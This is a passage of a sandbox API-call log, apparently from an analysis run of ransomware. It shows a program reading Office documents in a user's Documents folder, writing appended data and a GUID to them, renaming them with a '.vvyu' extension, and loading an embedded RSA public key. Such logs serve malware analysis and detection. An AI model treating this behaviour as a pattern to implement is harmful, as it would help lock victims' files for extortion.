RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f00 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ab0 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b40 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b58 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b28 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.314] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0194.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b58 [0194.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0194.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b28 [0194.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2b40 [0194.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0194.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0194.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0194.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0194.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0194.318] GetCurrentThreadId () returned 0x66c [0194.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9fda0 [0194.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.318] GetCurrentThreadId () returned 0x66c [0194.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac90 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b58 [0194.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b40 [0194.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b28 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ae0 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b70 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b88 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ac8 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b40 [0194.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0194.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0194.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0194.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ae0 | out: hHeap=0x620000) returned 1 [0194.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ab0 | out: hHeap=0x620000) returned 1 [0194.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f00 | out: hHeap=0x620000) returned 1 [0194.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0194.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.329] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x17e6b, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x17e6b, lpOverlapped=0x0) returned 1 [0194.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.331] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x17e70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.331] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.333] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.333] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.333] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.334] CloseHandle (hObject=0x568) returned 1 [0194.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0194.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea3a68 [0194.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0194.336] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\_3Wl5D4o0g2MKtP.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\_3wl5d4o0g2mktp.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\_3Wl5D4o0g2MKtP.pptx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\_3wl5d4o0g2mktp.pptx.vvyu")) returned 1 [0194.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.338] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0194.341] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38d15e90, ftCreationTime.dwHighDateTime=0x1d83a11, ftLastAccessTime.dwLowDateTime=0xa7c7e6b0, ftLastAccessTime.dwHighDateTime=0x1d85993, ftLastWriteTime.dwLowDateTime=0xa7c7e6b0, ftLastWriteTime.dwHighDateTime=0x1d85993, nFileSizeHigh=0x0, nFileSizeLow=0x18422, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dmv92XP.pptx", cAlternateFileName="_DMV92~1.PPT")) returned 1 [0194.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f00 [0194.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f00 | out: hHeap=0x620000) returned 1 [0194.341] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\_dmv92XP.pptx") returned=".pptx" [0194.341] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\_dmv92XP.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\_dmv92xp.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.342] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=99362) returned 1 [0194.342] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.344] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x183fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.344] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.346] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.346] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x18422, lpOverlapped=0x0) returned 1 [0194.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.347] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.349] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.349] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.349] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.349] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.349] GetLastError () returned 0x0 [0194.349] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.349] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.349] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.349] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.349] 